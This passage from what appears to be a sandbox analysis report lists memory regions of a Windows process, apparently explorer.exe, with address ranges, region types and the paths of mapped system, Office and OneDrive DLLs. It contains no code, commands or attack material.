start_va = 0xa860000 end_va = 0xa8dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a860000" filename = "" Region: id = 624 start_va = 0xa8e0000 end_va = 0xa95ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a8e0000" filename = "" Region: id = 625 start_va = 0xa960000 end_va = 0xa9dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a960000" filename = "" Region: id = 626 start_va = 0xa9e0000 end_va = 0xaadffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000a9e0000" filename = "" Region: id = 627 start_va = 0xaae0000 end_va = 0xaae3fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 628 start_va = 0xaaf0000 end_va = 0xafe1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000aaf0000" filename = "" Region: id = 629 start_va = 0xb360000 end_va = 0xb3dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b360000" filename = "" Region: id = 630 start_va = 0xb3e0000 end_va = 0xb45ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b3e0000" filename = "" Region: id = 631 start_va = 0xb4e0000 end_va = 0xb55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b4e0000" filename = "" Region: id = 632 start_va = 0xb560000 end_va = 0xb5dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b560000" filename = "" Region: id = 633 start_va = 0xb9e0000 end_va = 0xba5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000b9e0000" filename = "" Region: id = 634 start_va = 0xbae0000 end_va = 0xbb5ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bae0000" filename = "" Region: id = 635 start_va = 0xbc60000 end_va = 0xbcdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000bc60000" filename = "" Region: id = 636 start_va = 0xbce0000 end_va = 0xc6dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000bce0000" filename = "" Region: id = 637 start_va = 0xc6e0000 end_va = 0xf2fdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 638 start_va = 0xf300000 end_va = 0xf7f1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f300000" filename = "" Region: id = 639 start_va = 0xf8e0000 end_va = 0x100dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000000f8e0000" filename = "" Region: id = 640 start_va = 0x100e0000 end_va = 0x1015ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000100e0000" filename = "" Region: id = 641 start_va = 0x10660000 end_va = 0x106dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000010660000" filename = "" Region: id = 642 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 643 start_va = 0x180000000 end_va = 0x18087dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\1033\\grooveintlresource.dll") Region: id = 644 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 645 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 646 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 647 start_va = 0x7ff6ca9b0000 end_va = 0x7ff6cadf7fff monitored = 0 entry_point = 0x7ff6caa4e090 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 648 start_va = 0x7ffc439f0000 end_va = 0x7ffc439f8fff monitored = 0 entry_point = 0x7ffc439f1b60 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 649 start_va = 0x7ffc43b80000 end_va = 0x7ffc4484cfff monitored = 0 entry_point = 0x7ffc43cce880 region_type = mapped_file name = "ieframe.dll" filename = "\\Windows\\System32\\ieframe.dll" (normalized: "c:\\windows\\system32\\ieframe.dll") Region: id = 650 start_va = 0x7ffc44b10000 end_va = 0x7ffc44c63fff monitored = 0 entry_point = 0x7ffc44b17d6c region_type = mapped_file name = "msoshext.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesCommonX64\\Microsoft Shared\\OFFICE16\\msoshext.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilescommonx64\\microsoft shared\\office16\\msoshext.dll") Region: id = 651 start_va = 0x7ffc45230000 end_va = 0x7ffc4527dfff monitored = 0 entry_point = 0x7ffc45241ce0 region_type = mapped_file name = "framedynos.dll" filename = "\\Windows\\System32\\framedynos.dll" (normalized: "c:\\windows\\system32\\framedynos.dll") Region: id = 652 start_va = 0x7ffc45f70000 end_va = 0x7ffc4601bfff monitored = 0 entry_point = 0x7ffc45f759c0 region_type = mapped_file name = "ieproxy.dll" filename = "\\Windows\\System32\\ieproxy.dll" (normalized: "c:\\windows\\system32\\ieproxy.dll") Region: id = 653 start_va = 0x7ffc46590000 end_va = 0x7ffc468d5fff monitored = 0 entry_point = 0x7ffc46598530 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 654 start_va = 0x7ffc468e0000 end_va = 0x7ffc46b22fff monitored = 0 entry_point = 0x7ffc468e36c0 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 655 start_va = 0x7ffc46b30000 end_va = 0x7ffc46b7ffff monitored = 0 entry_point = 0x7ffc46b3be50 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 656 start_va = 0x7ffc46b80000 end_va = 0x7ffc46b96fff monitored = 0 entry_point = 0x7ffc46b82790 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 657 start_va = 0x7ffc46ba0000 end_va = 0x7ffc46be1fff monitored = 0 entry_point = 0x7ffc46ba2230 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 658 start_va = 0x7ffc46bf0000 end_va = 0x7ffc46c68fff monitored = 0 entry_point = 0x7ffc46bf22d0 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 659 start_va = 0x7ffc46c70000 end_va = 0x7ffc46ceafff monitored = 0 entry_point = 0x7ffc46c73af0 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 660 start_va = 0x7ffc46cf0000 end_va = 0x7ffc46e49fff monitored = 0 entry_point = 0x7ffc46cf4610 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 661 start_va = 0x7ffc46e50000 end_va = 0x7ffc4704dfff monitored = 0 entry_point = 0x7ffc46e516c0 region_type = mapped_file name = "batmeter.dll" filename = "\\Windows\\System32\\batmeter.dll" (normalized: "c:\\windows\\system32\\batmeter.dll") Region: id = 662 start_va = 0x7ffc47050000 end_va = 0x7ffc470b3fff monitored = 0 entry_point = 0x7ffc47056b20 region_type = mapped_file name = "stobject.dll" filename = "\\Windows\\System32\\stobject.dll" (normalized: "c:\\windows\\system32\\stobject.dll") Region: id = 663 start_va = 0x7ffc47420000 end_va = 0x7ffc4745dfff monitored = 0 entry_point = 0x7ffc47429650 region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\System32\\mlang.dll" (normalized: "c:\\windows\\system32\\mlang.dll") Region: id = 664 start_va = 0x7ffc49d90000 end_va = 0x7ffc49ed0fff monitored = 0 entry_point = 0x7ffc49d95f70 region_type = mapped_file name = "werconcpl.dll" filename = "\\Windows\\System32\\werconcpl.dll" (normalized: "c:\\windows\\system32\\werconcpl.dll") Region: id = 665 start_va = 0x7ffc4a2a0000 end_va = 0x7ffc4a33ffff monitored = 0 entry_point = 0x7ffc4a310910 region_type = mapped_file name = "wer.dll" filename = "\\Windows\\System32\\wer.dll" (normalized: "c:\\windows\\system32\\wer.dll") Region: id = 666 start_va = 0x7ffc4a340000 end_va = 0x7ffc4a460fff monitored = 0 entry_point = 0x7ffc4a341cc0 region_type = mapped_file name = "wscui.cpl" filename = "\\Windows\\System32\\wscui.cpl" (normalized: "c:\\windows\\system32\\wscui.cpl") Region: id = 667 start_va = 0x7ffc4a470000 end_va = 0x7ffc4a4a4fff monitored = 0 entry_point = 0x7ffc4a473cc0 region_type = mapped_file name = "wscapi.dll" filename = "\\Windows\\System32\\wscapi.dll" (normalized: "c:\\windows\\system32\\wscapi.dll") Region: id = 668 start_va = 0x7ffc4a590000 end_va = 0x7ffc4a5bdfff monitored = 0 entry_point = 0x7ffc4a596580 region_type = mapped_file name = "wscinterop.dll" filename = "\\Windows\\System32\\wscinterop.dll" (normalized: "c:\\windows\\system32\\wscinterop.dll") Region: id = 669 start_va = 0x7ffc4af60000 end_va = 0x7ffc4afa7fff monitored = 0 entry_point = 0x7ffc4af6a430 region_type = mapped_file name = "notificationobjfactory.dll" filename = "\\Windows\\System32\\NotificationObjFactory.dll" (normalized: "c:\\windows\\system32\\notificationobjfactory.dll") Region: id = 670 start_va = 0x7ffc4bce0000 end_va = 0x7ffc4bcf4fff monitored = 0 entry_point = 0x7ffc4bce5740 region_type = mapped_file name = "profext.dll" filename = "\\Windows\\System32\\profext.dll" (normalized: "c:\\windows\\system32\\profext.dll") Region: id = 671 start_va = 0x7ffc4bd00000 end_va = 0x7ffc4bd4afff monitored = 0 entry_point = 0x7ffc4bd11590 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 672 start_va = 0x7ffc4bd50000 end_va = 0x7ffc4bd63fff monitored = 0 entry_point = 0x7ffc4bd53710 region_type = mapped_file name = "mskeyprotect.dll" filename = "\\Windows\\System32\\mskeyprotect.dll" (normalized: "c:\\windows\\system32\\mskeyprotect.dll") Region: id = 673 start_va = 0x7ffc4be00000 end_va = 0x7ffc4be1dfff monitored = 0 entry_point = 0x7ffc4be0ef80 region_type = mapped_file name = "ncryptsslp.dll" filename = "\\Windows\\System32\\ncryptsslp.dll" (normalized: "c:\\windows\\system32\\ncryptsslp.dll") Region: id = 674 start_va = 0x7ffc4bf10000 end_va = 0x7ffc4bf1ffff monitored = 0 entry_point = 0x7ffc4bf13d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 675 start_va = 0x7ffc4bf20000 end_va = 0x7ffc4bf2ffff monitored = 0 entry_point = 0x7ffc4bf278e0 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 676 start_va = 0x7ffc4c910000 end_va = 0x7ffc4c931fff monitored = 0 entry_point = 0x7ffc4c912580 region_type = mapped_file name = "wcmapi.dll" filename = "\\Windows\\System32\\wcmapi.dll" (normalized: "c:\\windows\\system32\\wcmapi.dll") Region: id = 677 start_va = 0x7ffc4cc30000 end_va = 0x7ffc4cca6fff monitored = 0 entry_point = 0x7ffc4cc32af0 region_type = mapped_file name = "provsvc.dll" filename = "\\Windows\\System32\\provsvc.dll" (normalized: "c:\\windows\\system32\\provsvc.dll") Region: id = 678 start_va = 0x7ffc4dfc0000 end_va = 0x7ffc4dffffff monitored = 0 entry_point = 0x7ffc4dfd6c60 region_type = mapped_file name = "netprofm.dll" filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll") Region: id = 679 start_va = 0x7ffc4e070000 end_va = 0x7ffc4e08efff monitored = 0 entry_point = 0x7ffc4e0737e0 region_type = mapped_file name = "netsetupapi.dll" filename = "\\Windows\\System32\\NetSetupApi.dll" (normalized: "c:\\windows\\system32\\netsetupapi.dll") Region: id = 680 start_va = 0x7ffc4e090000 end_va = 0x7ffc4e108fff monitored = 0 entry_point = 0x7ffc4e0976a0 region_type = mapped_file name = "netsetupshim.dll" filename = "\\Windows\\System32\\NetSetupShim.dll" (normalized: "c:\\windows\\system32\\netsetupshim.dll") Region: id = 681 start_va = 0x7ffc4e2f0000 end_va = 0x7ffc4e305fff monitored = 0 entry_point = 0x7ffc4e2f1d50 region_type = mapped_file name = "wwapi.dll" filename = "\\Windows\\System32\\wwapi.dll" (normalized: "c:\\windows\\system32\\wwapi.dll") Region: id = 682 start_va = 0x7ffc4e6d0000 end_va = 0x7ffc4e887fff monitored = 0 entry_point = 0x7ffc4e73e630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 683 start_va = 0x7ffc4f120000 end_va = 0x7ffc4f17bfff monitored = 0 entry_point = 0x7ffc4f137190 region_type = mapped_file name = "ninput.dll" filename = "\\Windows\\System32\\ninput.dll" (normalized: "c:\\windows\\system32\\ninput.dll") Region: id = 684 start_va = 0x7ffc4f180000 end_va = 0x7ffc4f216fff monitored = 0 entry_point = 0x7ffc4f18ddc0 region_type = mapped_file name = "wlidprov.dll" filename = "\\Windows\\System32\\wlidprov.dll" (normalized: "c:\\windows\\system32\\wlidprov.dll") Region: id = 685 start_va = 0x7ffc4f220000 end_va = 0x7ffc4f22bfff monitored = 0 entry_point = 0x7ffc4f2235c0 region_type = mapped_file name = "secur32.dll" filename = "\\Windows\\System32\\secur32.dll" (normalized: "c:\\windows\\system32\\secur32.dll") Region: id = 686 start_va = 0x7ffc4f280000 end_va = 0x7ffc4f28bfff monitored = 0 entry_point = 0x7ffc4f2814b0 region_type = mapped_file name = "notificationcontrollerps.dll" filename = "\\Windows\\System32\\NotificationControllerPS.dll" (normalized: "c:\\windows\\system32\\notificationcontrollerps.dll") Region: id = 687 start_va = 0x7ffc4f290000 end_va = 0x7ffc4f438fff monitored = 0 entry_point = 0x7ffc4f2e4060 region_type = mapped_file name = "gdiplus.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\GdiPlus.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.10586.0_none_0bdd1d3064f6384a\\gdiplus.dll") Region: id = 688 start_va = 0x7ffc50600000 end_va = 0x7ffc50625fff monitored = 0 entry_point = 0x7ffc50615cb0 region_type = mapped_file name = "npsm.dll" filename = "\\Windows\\System32\\NPSM.dll" (normalized: "c:\\windows\\system32\\npsm.dll") Region: id = 689 start_va = 0x7ffc50630000 end_va = 0x7ffc5065afff monitored = 0 entry_point = 0x7ffc50634240 region_type = mapped_file name = "abovelockapphost.dll" filename = "\\Windows\\System32\\AboveLockAppHost.dll" (normalized: "c:\\windows\\system32\\abovelockapphost.dll") Region: id = 690 start_va = 0x7ffc506a0000 end_va = 0x7ffc50725fff monitored = 0 entry_point = 0x7ffc506c1e10 region_type = mapped_file name = "notificationcontroller.dll" filename = "\\Windows\\System32\\NotificationController.dll" (normalized: "c:\\windows\\system32\\notificationcontroller.dll") Region: id = 691 start_va = 0x7ffc50730000 end_va = 0x7ffc50809fff monitored = 0 entry_point = 0x7ffc50763c00 region_type = mapped_file name = "wpncore.dll" filename = "\\Windows\\System32\\wpncore.dll" (normalized: "c:\\windows\\system32\\wpncore.dll") Region: id = 692 start_va = 0x7ffc508f0000 end_va = 0x7ffc50a0ffff monitored = 0 entry_point = 0x7ffc50928310 region_type = mapped_file name = "applicationframe.dll" filename = "\\Windows\\System32\\ApplicationFrame.dll" (normalized: "c:\\windows\\system32\\applicationframe.dll") Region: id = 693 start_va = 0x7ffc50a10000 end_va = 0x7ffc50a46fff monitored = 0 entry_point = 0x7ffc50a120a0 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 694 start_va = 0x7ffc50a50000 end_va = 0x7ffc50d89fff monitored = 0 entry_point = 0x7ffc50a58520 region_type = mapped_file name = "msi.dll" filename = "\\Windows\\System32\\msi.dll" (normalized: "c:\\windows\\system32\\msi.dll") Region: id = 695 start_va = 0x7ffc50d90000 end_va = 0x7ffc50e2dfff monitored = 0 entry_point = 0x7ffc50dd9d40 region_type = mapped_file name = "msvcp140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\msvcp140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\msvcp140.dll") Region: id = 696 start_va = 0x7ffc50e30000 end_va = 0x7ffc50e46fff monitored = 0 entry_point = 0x7ffc50e3c440 region_type = mapped_file name = "vcruntime140.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\vcruntime140.dll" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\vcruntime140.dll") Region: id = 697 start_va = 0x7ffc50e50000 end_va = 0x7ffc51063fff monitored = 0 entry_point = 0x7ffc50e51000 region_type = mapped_file name = "grooveex.dll" filename = "\\Program Files (x86)\\Microsoft Office\\root\\VFS\\ProgramFilesX64\\Microsoft Office\\Office16\\GROOVEEX.DLL" (normalized: "c:\\program files (x86)\\microsoft office\\root\\vfs\\programfilesx64\\microsoft office\\office16\\grooveex.dll") Region: id = 698 start_va = 0x7ffc51070000 end_va = 0x7ffc512fdfff monitored = 0 entry_point = 0x7ffc51140f00 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 699 start_va = 0x7ffc51300000 end_va = 0x7ffc51309fff monitored = 0 entry_point = 0x7ffc51301350 region_type = mapped_file name = "version.dll" filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll") Region: id = 700 start_va = 0x7ffc51310000 end_va = 0x7ffc513fefff monitored = 0 entry_point = 0x7ffc513329cc region_type = mapped_file name = "msvcr120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcr120.dll") Region: id = 701 start_va = 0x7ffc51400000 end_va = 0x7ffc514a5fff monitored = 0 entry_point = 0x7ffc5144efec region_type = mapped_file name = "msvcp120.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\msvcp120.dll") Region: id = 702 start_va = 0x7ffc514b0000 end_va = 0x7ffc5163efff monitored = 0 entry_point = 0x7ffc514c01d8 region_type = mapped_file name = "filesyncshell64.dll" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\OneDrive\\17.3.5892.0626_4\\amd64\\FileSyncShell64.dll" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\onedrive\\17.3.5892.0626_4\\amd64\\filesyncshell64.dll") Region: id = 703 start_va = 0x7ffc51640000 end_va = 0x7ffc5164cfff monitored = 0 entry_point = 0x7ffc51641ea0 region_type = mapped_file name = "linkinfo.dll" filename = "\\Windows\\System32\\linkinfo.dll" (normalized: "c:\\windows\\system32\\linkinfo.dll") Region: id = 704 start_va = 0x7ffc51650000 end_va = 0x7ffc5169cfff monitored = 0 entry_point = 0x7ffc51667de0 region_type = mapped_file name = "thumbcache.dll" filename = "\\Windows\\System32\\thumbcache.dll" (normalized: "c:\\windows\\system32\\thumbcache.dll") Region: id = 705 start_va = 0x7ffc516a0000 end_va = 0x7ffc516b1fff monitored = 0 entry_point = 0x7ffc516a3580 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 706 start_va = 0x7ffc516c0000 end_va = 0x7ffc516e5fff monitored = 0 entry_point = 0x7ffc516c1cf0 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 707 start_va = 0x7ffc516f0000 end_va = 0x7ffc517cafff monitored = 0 entry_point = 0x7ffc517028b0 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 708 start_va = 0x7ffc51940000 end_va = 0x7ffc5195afff monitored = 0 entry_point = 0x7ffc5194af40 region_type = mapped_file name = "capauthz.dll" filename = "\\Windows\\System32\\capauthz.dll" (normalized: "c:\\windows\\system32\\capauthz.dll") Region: id = 709 start_va = 0x7ffc51960000 end_va = 0x7ffc519f3fff monitored = 0 entry_point = 0x7ffc51999210 region_type = mapped_file name = "staterepository.core.dll" filename = "\\Windows\\System32\\StateRepository.Core.dll" (normalized: "c:\\windows\\system32\\staterepository.core.dll") Region: id = 710 start_va = 0x7ffc51a00000 end_va = 0x7ffc51ca2fff monitored = 0 entry_point = 0x7ffc51a26190 region_type = mapped_file name = "windows.staterepository.dll" filename = "\\Windows\\System32\\Windows.StateRepository.dll" (normalized: "c:\\windows\\system32\\windows.staterepository.dll") Region: id = 711 start_va = 0x7ffc51cd0000 end_va = 0x7ffc51cdbfff monitored = 0 entry_point = 0x7ffc51cd18b0 region_type = mapped_file name = "wldp.dll" filename = "\\Windows\\System32\\wldp.dll" (normalized: "c:\\windows\\system32\\wldp.dll") Region: id = 712 start_va = 0x7ffc51ce0000 end_va = 0x7ffc51d2cfff monitored = 0 entry_point = 0x7ffc51ced180 region_type = mapped_file name = "windows.immersiveshell.serviceprovider.dll" filename = "\\Windows\\System32\\windows.immersiveshell.serviceprovider.dll" (normalized: "c:\\windows\\system32\\windows.immersiveshell.serviceprovider.dll") Region: id = 713 start_va = 0x7ffc51d30000 end_va = 0x7ffc5283afff monitored = 0 entry_point = 0x7ffc51e7a540 region_type = mapped_file name = "twinui.dll" filename = "\\Windows\\System32\\twinui.dll" (normalized: "c:\\windows\\system32\\twinui.dll") Region: id = 714 start_va = 0x7ffc52840000 end_va = 0x7ffc5288ffff monitored = 0 entry_point = 0x7ffc52842580 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\System32\\edputil.dll" (normalized: "c:\\windows\\system32\\edputil.dll") Region: id = 715 start_va = 0x7ffc52890000 end_va = 0x7ffc52d2ffff monitored = 0 entry_point = 0x7ffc52928740 region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\System32\\ExplorerFrame.dll" (normalized: "c:\\windows\\system32\\explorerframe.dll") Region: id = 716 start_va = 0x7ffc52d30000 end_va = 0x7ffc52d79fff monitored = 0 entry_point = 0x7ffc52d35800 region_type = mapped_file name = "dataexchange.dll" filename = "\\Windows\\System32\\DataExchange.dll" (normalized: "c:\\windows\\system32\\dataexchange.dll") Region: id = 717 start_va = 0x7ffc52d80000 end_va = 0x7ffc52de9fff monitored = 0 entry_point = 0x7ffc52d95e90 region_type = mapped_file name = "oleacc.dll" filename = "\\Windows\\System32\\oleacc.dll" (normalized: "c:\\windows\\system32\\oleacc.dll") Region: id = 718 start_va = 0x7ffc52df0000 end_va = 0x7ffc52e54fff monitored = 0 entry_point = 0x7ffc52df4c50 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 719 start_va = 0x7ffc52e60000 end_va = 0x7ffc530d3fff monitored = 0 entry_point = 0x7ffc52ed0400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 720 start_va = 0x7ffc530e0000 end_va = 0x7ffc530f4fff monitored = 0 entry_point = 0x7ffc530e2c90 region_type = mapped_file name = "settingsyncpolicy.dll" filename = "\\Windows\\System32\\SettingSyncPolicy.dll" (normalized: "c:\\windows\\system32\\settingsyncpolicy.dll") Region: id = 721 start_va = 0x7ffc53100000 end_va = 0x7ffc531b0fff monitored = 0 entry_point = 0x7ffc531108f0 region_type = mapped_file name = "twinapi.dll" filename = "\\Windows\\System32\\twinapi.dll" (normalized: "c:\\windows\\system32\\twinapi.dll") Region: id = 722 start_va = 0x7ffc531d0000 end_va = 0x7ffc531e4fff monitored = 0 entry_point = 0x7ffc531d1ab0 region_type = mapped_file name = "execmodelproxy.dll" filename = "\\Windows\\System32\\execmodelproxy.dll" (normalized: "c:\\windows\\system32\\execmodelproxy.dll") Region: id = 723 start_va = 0x7ffc531f0000 end_va = 0x7ffc532bdfff monitored = 0 entry_point = 0x7ffc532214c0 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 724 start_va = 0x7ffc532c0000 end_va = 0x7ffc533b8fff monitored = 0 entry_point = 0x7ffc53308000 region_type = mapped_file name = "settingsynccore.dll" filename = "\\Windows\\System32\\SettingSyncCore.dll" (normalized: "c:\\windows\\system32\\settingsynccore.dll") Region: id = 725 start_va = 0x7ffc53440000 end_va = 0x7ffc5346afff monitored = 0 entry_point = 0x7ffc5344c3c0 region_type = mapped_file name = "rtworkq.dll" filename = "\\Windows\\System32\\RTWorkQ.dll" (normalized: "c:\\windows\\system32\\rtworkq.dll") Region: id = 726 start_va = 0x7ffc53470000 end_va = 0x7ffc5357cfff monitored = 0 entry_point = 0x7ffc5349f420 region_type = mapped_file name = "mfplat.dll" filename = "\\Windows\\System32\\mfplat.dll" (normalized: "c:\\windows\\system32\\mfplat.dll") Region: id = 727 start_va = 0x7ffc53600000 end_va = 0x7ffc5365efff monitored = 0 entry_point = 0x7ffc5362bce0 region_type = mapped_file name = "dsreg.dll" filename = "\\Windows\\System32\\dsreg.dll" (normalized: "c:\\windows\\system32\\dsreg.dll") Region: id = 728 start_va = 0x7ffc538e0000 end_va = 0x7ffc538e9fff monitored = 0 entry_point = 0x7ffc538e14c0 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 729 start_va = 0x7ffc53930000 end_va = 0x7ffc53b8cfff monitored = 0 entry_point = 0x7ffc539b8610 region_type = mapped_file name = "twinui.appcore.dll" filename = "\\Windows\\System32\\twinui.appcore.dll" (normalized: "c:\\windows\\system32\\twinui.appcore.dll") Region: id = 730 start_va = 0x7ffc53b90000 end_va = 0x7ffc53b98fff monitored = 0 entry_point = 0x7ffc53b91480 region_type = mapped_file name = "wpportinglibrary.dll" filename = "\\Windows\\System32\\WpPortingLibrary.dll" (normalized: "c:\\windows\\system32\\wpportinglibrary.dll") Region: id = 731 start_va = 0x7ffc53ef0000 end_va = 0x7ffc53f3afff monitored = 0 entry_point = 0x7ffc53f07b70 region_type = mapped_file name = "veeventdispatcher.dll" filename = "\\Windows\\System32\\VEEventDispatcher.dll" (normalized: "c:\\windows\\system32\\veeventdispatcher.dll") Region: id = 732 start_va = 0x7ffc54080000 end_va = 0x7ffc540fffff monitored = 0 entry_point = 0x7ffc540ad280 region_type = mapped_file name = "webio.dll" filename = "\\Windows\\System32\\webio.dll" (normalized: "c:\\windows\\system32\\webio.dll") Region: id = 733 start_va = 0x7ffc541c0000 end_va = 0x7ffc541cdfff monitored = 0 entry_point = 0x7ffc541c1460 region_type = mapped_file name = "npmproxy.dll" filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll") Region: id = 734 start_va = 0x7ffc541d0000 end_va = 0x7ffc541eafff monitored = 0 entry_point = 0x7ffc541d1040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 735 start_va = 0x7ffc541f0000 end_va = 0x7ffc54477fff 